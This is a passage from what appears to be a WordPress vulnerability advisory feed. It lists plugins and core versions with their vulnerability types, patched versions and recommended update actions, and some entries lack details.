Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Daily Inspiration Generator

Vulnerability: Open Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ND Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.6
Recommended Action: Update to version 6.6, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: SQL Injection
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: WordPress Social Comments Plugin for Vkontakte Comments and Disqus Comments

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Fix My Feed RSS Repair

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Google Analytics
Patched Version: 8.9.1
Recommended Action: Update to version 8.9.1, or a newer patched version

Plugin: WP Airbnb Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Authentication Bypass
Patched Version: 3.7.1.6
Recommended Action: Update to version 3.7.1.6, or a newer patched version

Plugin: Gravity Forms

Vulnerability: SQL Injection
Patched Version: 1.9.3.6
Recommended Action: Update to version 1.9.3.6, or a newer patched version

Plugin: Visual Email Designer for WooCommerce

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: AJAX Thumbnail Rebuild

Vulnerability: Missing Authorization
Patched Version: 1.14
Recommended Action: Update to version 1.14, or a newer patched version

Plugin: CRM WordPress Plugin – RepairBuddy

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: DTracker

Plugin: e-signature

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 1.5.6.8
Recommended Action: Update to version 1.5.6.8, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Authenticated(Admin+) Directory Traversal
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: Twitch Player

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Site Reviews

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via block attribute
Patched Version: 6.6.0
Recommended Action: Update to version 6.6.0, or a newer patched version

Plugin: Custom Product Tabs for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: WP Dialog

Plugin: VK Blocks Pro

Vulnerability: Stored (Contributor+) Cross-Site Scripting in Post
Patched Version: 1.54.0
Recommended Action: Update to version 1.54.0, or a newer patched version

Plugin: Zero Spam for WordPress

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 5.4.5
Recommended Action: Update to version 5.4.5, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.6.2
Recommended Action: Update to version 2.2.6.2, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Stored Cross-Site Scripting via Profile
Patched Version: 4.7.7
Recommended Action: Update to version 4.7.7, or a newer patched version

Plugin: WooCommerce Warranty Requests

Vulnerability: Missing Authorization
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: WordPress Robots.txt optimizer (+ XML Sitemap) – Boost SEO, Traffic & Rankings

Vulnerability: Cross Site Request Forgery
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 1.20.26
Recommended Action: Update to version 1.20.26, or a newer patched version

Plugin: Map Block for Google Maps

Vulnerability: Unprotected AJAX Action
Patched Version: 1.32
Recommended Action: Update to version 1.32, or a newer patched version

Plugin: WP Bootstrap Gallery

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HMS Testimonials

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Cross-Site Request Forgery to PHAR Deserialization
Patched Version: 5.5.4
Recommended Action: Update to version 5.5.4, or a newer patched version

Plugin: Contact Form for WordPress – Ultimate Form Builder Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_duplicate_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Document Embedder – Document Embedder Plugin

Vulnerability: Sensitive Data Exposure
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Weather Effect – Christmas, Santa, Snow Falling, Snowflake Effect

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Reflected Cross-Site Scripting via error message
Patched Version: 4.11.0
Recommended Action: Update to version 4.11.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Parameter Tampering
Patched Version: 3.2.15
Recommended Action: Update to version 3.2.15, or a newer patched version

Plugin: GTM4WP – A Google Tag Manager (GTM) plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting via Site Search
Patched Version: 1.15.1
Recommended Action: Update to version 1.15.1, or a newer patched version

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: SQL Injection
Patched Version: 6.2.4
Recommended Action: Update to version 6.2.4, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via filenames
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: WordPress NextGen GalleryView

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.13
Recommended Action: Update to version 1.13, or a newer patched version

Plugin: WooCommerce Customers Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 26.6
Recommended Action: Update to version 26.6, or a newer patched version

Plugin: mini-cart

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Five Star Restaurant Menu and Food Ordering

Vulnerability: Cross-Site Request Forgery via maybe_duplicate_item
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Live Chat by Formilla – Real-time Chat & Chatbots Plugin

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via ‘FormillaID’
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via CSS
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: underConstruction

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.21
Recommended Action: Update to version 1.21, or a newer patched version

Plugin: WP Comment Remix

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: BuddyPress

Vulnerability: Authorization Bypass to Friend Invite
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 4.1.6.1
Recommended Action: Update to version 4.1.6.1, or a newer patched version

Plugin: Dave's WordPress Live Search

Plugin: Unite Gallery Lite

Vulnerability: Cross-Site Request Forgery & Authenticated SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Maps Widget for Google Maps

Vulnerability: Cross-Site Request Forgery via dismiss_notice
Patched Version: 4.24
Recommended Action: Update to version 4.24, or a newer patched version

Plugin: Slideshow SE

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Open Redirection via redirect_to_https
Patched Version: 8.1.5
Recommended Action: Update to version 8.1.5, or a newer patched version

Plugin: WPSOLR – Elasticsearch and Solr search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.7
Recommended Action: Update to version 8.7, or a newer patched version

Plugin: Request a Quote

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Ultimate Form Builder <= 8.3.2
Patched Version: 8.3.3
Recommended Action: Update to version 8.3.3, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery via migrateCommonToProductOnly function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Builder forms Addon For WordPress <= 5.4
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Captcha by BestWebSoft – Spam Protection, Security Plugin for WordPress Forms

Vulnerability: CAPTCHA Bypass
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Falang multilanguage for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.18
Recommended Action: Update to version 1.3.18, or a newer patched version

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Reflected Cross-Site Scripting via ‘delete_mobile’
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 6.5.8
Recommended Action: Update to version 6.5.8, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting and Settings Reset
Patched Version: 4.2.9
Recommended Action: Update to version 4.2.9, or a newer patched version

Plugin: Tooltipy (tooltips for WP)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Chaty <= 3.0.2
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: NewStatPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Culture Object

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Advance Menu Manager

Vulnerability: Missing Authorization
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Compfight

Vulnerability: Cross-Site Scrpting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Arbitrary File Upload
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: Better Click To Tweet

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.10.4
Recommended Action: Update to version 5.10.4, or a newer patched version

Plugin: Portable phpMyAdmin

Vulnerability: Authentication Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Sharebar

Vulnerability: SQL Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Call Now Accessibility Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Core: WordPress

Vulnerability: Type Confusion
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.14, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: WatchTowerHQ

Vulnerability: Unauthenticated Arbitrary File Download
Patched Version: 3.6.16
Recommended Action: Update to version 3.6.16, or a newer patched version

Plugin: Category Post List Widget

Vulnerability: Cross-Site Request Forgery via get_cplw_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NewStatPress

Vulnerability: SQL Injection
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Broken Link Manager

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.15.6
Recommended Action: Update to version 1.15.6, or a newer patched version

Plugin: WP BrowserUpdate

Vulnerability: Cross-Site Request Forgery via wpbu_administration
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Internal Links Manager

Vulnerability: Multiple Stored Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Recommended Products – EDD

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3.3
Recommended Action: Update to version 1.2.3.3, or a newer patched version

Plugin: Extensions For CF7 (Contact form 7 Database, Conditional Fields and Redirection)

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Table of Contents Plus

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2309
Recommended Action: Update to version 2309, or a newer patched version

Plugin: Avada (Fusion) Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: GDPR Compliance & Cookie Consent

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: demon image annotation

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: WordPress NextGen GalleryView

Plugin: Jquery accordion slideshow

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 8.2
Recommended Action: Update to version 8.2, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 0.72
Recommended Action: Update to version 0.72, or a newer patched version

Plugin: Simple SEO

Vulnerability: Cross-Site Request Forgery via multiple admin_post functions
Patched Version: 2.0.26
Recommended Action: Update to version 2.0.26, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: 2.0.15
Patched Version: 2.0.16
Recommended Action: Update to version 2.0.16, or a newer patched version

Plugin: Webriti SMTP Mail

Vulnerability: Cross-Site Request Forgery to options update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Showbiz Pro Responsive Teaser WordPress Plugin

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DrawBlog

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.81
Recommended Action: Update to version 0.81, or a newer patched version

Plugin: Product Filter for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 8.2.0
Recommended Action: Update to version 8.2.0, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Content Cards

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.7
Recommended Action: Update to version 0.9.7, or a newer patched version

Plugin: wp-forecast

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 8.0
Recommended Action: Update to version 8.0, or a newer patched version

Plugin: Media File Manager

Vulnerability: Directory Traversal to Directory Listing
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: firestats

Vulnerability: Remote File Inclusion
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Thumbnail Slider With Lightbox

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: EZP Coming Soon Page

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 1.0.74
Recommended Action: Update to version 1.0.74, or a newer patched version

Plugin: Booking Calendar Contact Form

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Feedback Form Submission
Patched Version: 1.2.35
Recommended Action: Update to version 1.2.35, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.62
Recommended Action: Update to version 4.62, or a newer patched version

Plugin: Disable User Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: WP Dummy Content Generator

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: CALL ME NOW

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: LDAP Passback
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Core: WordPress

Vulnerability: Hash Collision
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: Portfolio Gallery

Plugin: Optima Express + MarketBoost IDX Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: underConstruction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.19
Recommended Action: Update to version 1.19, or a newer patched version

Plugin: myftp-ftp-like-plugin-for-wordpress

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.15.19
Recommended Action: Update to version 1.15.19, or a newer patched version

Plugin: Publish Confirm Message

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Pipdig Power Pack (P3)

Vulnerability: Backdoor
Patched Version: 4.8.0
Recommended Action: Update to version 4.8.0, or a newer patched version

Plugin: s2Framework

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Unauthenticated Local/Remote File Inclusion & Remote Code Execution
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: Missing Authorization to Redirect Creation
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: PDF & Print by BestWebSoft – WordPress Posts and Pages PDF Generator Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: MainWP Wordfence Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: VikRentCar Car Rental Management System

Vulnerability: Authenticated (Admin+) Cross Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: VK Blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block
Patched Version: 1.64.0.0
Recommended Action: Update to version 1.64.0.0, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Text Editor
Patched Version: 2.5.5.3
Recommended Action: Update to version 2.5.5.3, or a newer patched version

Plugin: Comment Rating

Plugin: Top Bar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: wSecure Lite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: DSGVO All in one for WP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: Advanced Local Pickup for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Lazy Load

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.6.1
Recommended Action: Update to version 0.6.1, or a newer patched version

Plugin: Campaign URL Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Create Link
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Autotitle for WordPress

Vulnerability: Cross-Site Request Forgery to Settings Update and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smash Balloon Social Photo Feed – Easy Social Feeds Plugin

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Rezgo Online Booking

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Telephone Number Linker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Link Juice Keeper

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Audio Merchant

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Facebook Members

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: WP Media Cleaner

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: WooCommerce Square

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: WPML

Vulnerability: Cross-Site Scripting in Accept-Language Header
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: Export All URLs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Form Vibes – Database Manager for Forms

Vulnerability: Authenticated (Admininstrator+) SQL Injection
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Missing Authorization
Patched Version: 3.1.18
Recommended Action: Update to version 3.1.18, or a newer patched version

Plugin: Admin Columns

Vulnerability: No subtitle
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: ADIF Log Search Widget

Plugin: SEOPress – On-site SEO

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 6.5.0.3
Recommended Action: Update to version 6.5.0.3, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Arbitrary File Upload
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Scoutnet Kalender

Plugin: Videos sync PDF

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Recip.ly Plugin

Vulnerability: Unauthenticated Arbitrary File Upload in uploadImage.php
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 0.5.28
Recommended Action: Update to version 0.5.28, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting via LaTeX markup within HTML elements
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Breadcrumbs by menu

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Arbitrary Post Deletion
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Simple Ajax Chat – Add a Fast, Secure Chat Box

Vulnerability: Cross-Site Request Forgery
Patched Version: 20220216
Recommended Action: Update to version 20220216, or a newer patched version

Plugin: Appointment Calendar

Plugin: affiliate-toolkit – WP Affiliate Plugin with Amazon

Vulnerability: Open Redirect via atkpout.php
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Panda Pods Repeater Field

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WP-Testimonials

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: SQL Injection
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.0.2
Recommended Action: Update to version 1.6.0.2, or a newer patched version

Plugin: Tickera – WordPress Event Ticketing

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.4.8.3
Recommended Action: Update to version 3.4.8.3, or a newer patched version

Plugin: Vertical marquee plugin

Plugin: Portfolio Responsive Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Social Auto Poster

Vulnerability: Cross-Site Request Forgery to Plugin Settings Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pagebar2

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Scripting
Patched Version: 2.66
Recommended Action: Update to version 2.66, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Stock Ticker

Vulnerability: Reflected Cross-Site Scripting in ajax_stockticker_load
Patched Version: 3.23.4
Recommended Action: Update to version 3.23.4, or a newer patched version

Plugin: ALO EasyMail Newsletter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Realia

Vulnerability: Cross-Site Request Forgery to User Email Change
Patched Version: No patched version available
